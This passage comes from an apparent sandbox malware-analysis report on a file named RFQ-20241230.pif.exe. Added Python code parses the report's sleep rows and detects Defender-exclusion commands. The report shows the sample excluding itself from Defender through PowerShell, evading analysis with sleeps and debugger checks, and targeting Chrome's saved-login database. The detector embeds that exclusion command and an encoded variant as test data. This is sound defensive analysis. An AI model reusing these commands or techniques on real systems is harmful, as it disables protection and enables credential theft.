Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0040E54F Sleep,ExitProcess
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Memory allocated: 1370000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Memory allocated: 3060000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Memory allocated: 5060000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Memory allocated: 9740000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Memory allocated: A740000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Memory allocated: A960000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Memory allocated: B960000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_004198D2 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5844
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3858
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Window / User API: threadDelayed 9817
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | API coverage: 9.0 %
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7724 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052 | Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972 | Thread sleep count: 177 > 30
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972 | Thread sleep time: -531000s >= -30000s
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972 | Thread sleep count: 9817 > 30
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972 | Thread sleep time: -29451000s >= -30000s
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0044D5F9 FindFirstFileExA
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00406AC2 FindFirstFileW,FindNextFileW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                Source: RFQ-20241230.pif.exe, 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | API call chain: ExitProcess graph end node graph_5-47953
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00442564 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0044E93E GetProcessHeap
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00433CE7 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Memory allocated: page read and write | page guard
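The sleep rows above, read as a worked example. This code is added here and is not part of the Joe Sandbox report. The figures are the relative timeout handed to NtDelayExecution, accumulated per thread: 922337203685477 is INT64_MIN in 100 ns ticks expressed in milliseconds, the value Windows passes for a wait that never returns, and the powershell.exe figure is exactly six of them. Two assumptions are built in and labelled in the code: the report's trailing "s" is really milliseconds (177 x 3000 = 531000 and 9817 x 3000 = 29451000 only add up as 3-second sleeps), and the several rows for one TID are cumulative snapshots, so the largest one wins. The 30000 ms budget mirrors the threshold printed in the rows.

```python
import re
from dataclasses import dataclass

# INT64_MIN in 100 ns ticks, expressed in milliseconds: 922337203685477, the
# value the report prints for a thread that waited "forever".  Unit assumption:
# the report's "s" suffix is really milliseconds (177 * 3000 = 531000 and
# 9817 * 3000 = 29451000 only work out as 3 s sleeps).
INFINITE_WAIT_MS = (2 ** 63) // 10_000

# One regex handles both row shapes ("Thread sleep count: N > 30" and
# "Thread sleep time: -N s >= -30000s"), with or without a separator after TID.
ROW = re.compile(
    r"Source:\s*(?P<proc>.+?)\s+TID:\s*(?P<tid>\d+)\D*?Thread sleep "
    r"(?P<kind>count|time):\s*(?P<val>-?\d+)s?\s*>=?\s*(?P<thr>-?\d+)"
)


@dataclass
class ThreadSleep:
    process: str
    tid: int
    count: int = 0      # number of NtDelayExecution calls seen
    total_ms: int = 0   # magnitude of the accumulated relative timeout


def parse_sleep_rows(lines):
    """Group sleep rows by (process, TID); rows for one TID are cumulative snapshots."""
    threads = {}
    for line in lines:
        m = ROW.search(line)
        if not m:
            continue
        key = (m["proc"], int(m["tid"]))
        t = threads.setdefault(key, ThreadSleep(*key))
        val = abs(int(m["val"]))
        if m["kind"] == "count":
            t.count = max(t.count, val)
        else:
            t.total_ms = max(t.total_ms, val)
    return threads


def classify(t, budget_ms=30_000):
    """Split a thread's total into infinite waits and a finite sleep loop."""
    infinite_waits = t.total_ms // INFINITE_WAIT_MS
    finite_ms = t.total_ms - infinite_waits * INFINITE_WAIT_MS
    per_call_ms = finite_ms // t.count if t.count and finite_ms else None
    if infinite_waits:
        verdict = f"{infinite_waits} infinite wait(s): thread parked until the process exits"
    elif finite_ms > budget_ms:
        verdict = f"sleep loop: {t.count} calls of about {per_call_ms} ms, {finite_ms / 1000:.0f} s in total"
    else:
        verdict = "within budget"
    return {
        "infinite_waits": infinite_waits,
        "finite_total_s": finite_ms / 1000,
        "per_call_ms": per_call_ms,
        "exceeds_budget": infinite_waits > 0 or finite_ms > budget_ms,
        "verdict": verdict,
    }


# Rows copied from the report above, in the fused form the page carries.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7724Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -5534023222112862s >= -30000s",
    r"Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972Thread sleep count: 177 > 30",
    r"Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972Thread sleep time: -531000s >= -30000s",
    r"Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972Thread sleep count: 9817 > 30",
    r"Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972Thread sleep time: -29451000s >= -30000s",
]

if __name__ == "__main__":
    for key, t in parse_sleep_rows(SAMPLE_ROWS).items():
        print(key, classify(t)["verdict"])
```

With that reading, TID 7972 is a 3 s polling loop (9817 iterations, roughly 8 hours of nominal sleep inside an analysis that lasted 7 minutes 40 seconds, so the sandbox evidently did not honour the full delays), while TID 7724 and the PowerShell thread are parked with infinite waits, which fits the Sleep,ExitProcess function at 5_2_0040E54F above.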

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Memory written: C:\Users\user\Desktop\RFQ-20241230.pif.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00410F36 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00418764 mouse_event
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Process created: C:\Users\user\Desktop\RFQ-20241230.pif.exe "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00433E1A cpuid
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_004510CA GetLocaleInfoW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_004470BE EnumSystemLocalesW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_004511F3 GetLocaleInfoW,GetLocaleInfoW,GetACP
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_004512FA GetLocaleInfoW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_004513C7 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_004475A7 GetLocaleInfoW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0040E679 GetLocaleInfoA
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00450A8F IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00450D52 EnumSystemLocalesW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00450D07 EnumSystemLocalesW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00450DED EnumSystemLocalesW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00450E7A GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Queries volume information: C:\Users\user\Desktop\RFQ-20241230.pif.exe VolumeInformation
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00404915 GetLocalTime,CreateEventA,CreateThread
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0041A7B2 GetComputerNameExW,GetUserNameW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
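The Add-MpPreference -ExclusionPath row above is the detection opportunity in this section: a binary running from the user's Desktop spawns PowerShell to exclude its own path from Defender. Below is an added example, not part of the report, of how to evaluate such process-creation events. The records are constructed here in Sysmon Event ID 1 field shapes (Image, ParentImage, CommandLine); the first reproduces the command line observed above, the second is a -EncodedCommand variant (base64 of UTF-16LE) that a plain-text match would miss without decoding, and the last two are a benign administrative use and a non-matching cmdlet. The switch spellings, the list of user-writable locations and the severity logic are this example's own choices.

```python
import base64
import re

# Cmdlet plus the exclusion parameter it carries; the value may be quoted.
EXCLUSION_RE = re.compile(
    r'(?:Add|Set)-MpPreference\b[^\n]*?-Exclusion(?P<kind>Path|Process|Extension|IpAddress)\s+'
    r'(?P<value>"[^"]+"|\S+)',
    re.IGNORECASE,
)
# Common spellings of powershell.exe's -EncodedCommand switch (assumed list).
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+(?P<b64>[A-Za-z0-9+/=]+)", re.IGNORECASE)
# Locations a standard user can write to; an exclusion there is what malware wants.
USER_WRITABLE = re.compile(r"^[a-z]:\\(?:users|programdata|windows\\temp)\\|\\appdata\\|\\temp\\", re.IGNORECASE)


def expand_command_line(cmd):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) to cmd."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m["b64"], validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return cmd
    return cmd + "\n" + decoded


def evaluate(event):
    """Return None if no exclusion is set, else a finding with its reasons."""
    cmd = expand_command_line(event["CommandLine"])
    m = EXCLUSION_RE.search(cmd)
    if not m:
        return None
    value = m["value"].strip('"')
    parent = event.get("ParentImage", "")
    reasons = []
    if USER_WRITABLE.search(parent):
        reasons.append("parent image runs from a user-writable location")
    if m["kind"].lower() == "path" and USER_WRITABLE.search(value):
        reasons.append("excluded path is user-writable")
    if value.lower() == parent.lower():
        reasons.append("parent excludes itself")
    if "\n" in cmd:
        reasons.append("cmdlet hidden in -EncodedCommand")
    return {"kind": m["kind"], "value": value,
            "severity": "high" if reasons else "low", "reasons": reasons}


def triage(events):
    """Indices and findings of the high-severity events, in input order."""
    out = []
    for i, ev in enumerate(events):
        f = evaluate(ev)
        if f and f["severity"] == "high":
            out.append({"index": i, **f})
    return out


# Constructed telemetry. Event 0 is the command line observed in the report;
# the rest are made up here to exercise the encoded, benign and no-match paths.
_ENCODED = base64.b64encode(
    r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"'.encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\Desktop\RFQ-20241230.pif.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\Build Agent"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe Get-MpPreference"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["index"], hit["kind"], hit["value"], hit["reasons"])
```

The test worth keeping is the self-exclusion one: an excluded value equal to the parent's own image is almost never legitimate, since administrators exclude directories from management tooling rather than the binary that is running the cmdlet. Verify the state as well as the command: on the host, Get-MpPreference shows in its ExclusionPath property whether the exclusion actually landed, and removing it is the first containment step.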

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0040B21B \AppData\Local\Google\Chrome\User Data\Default\Login Data
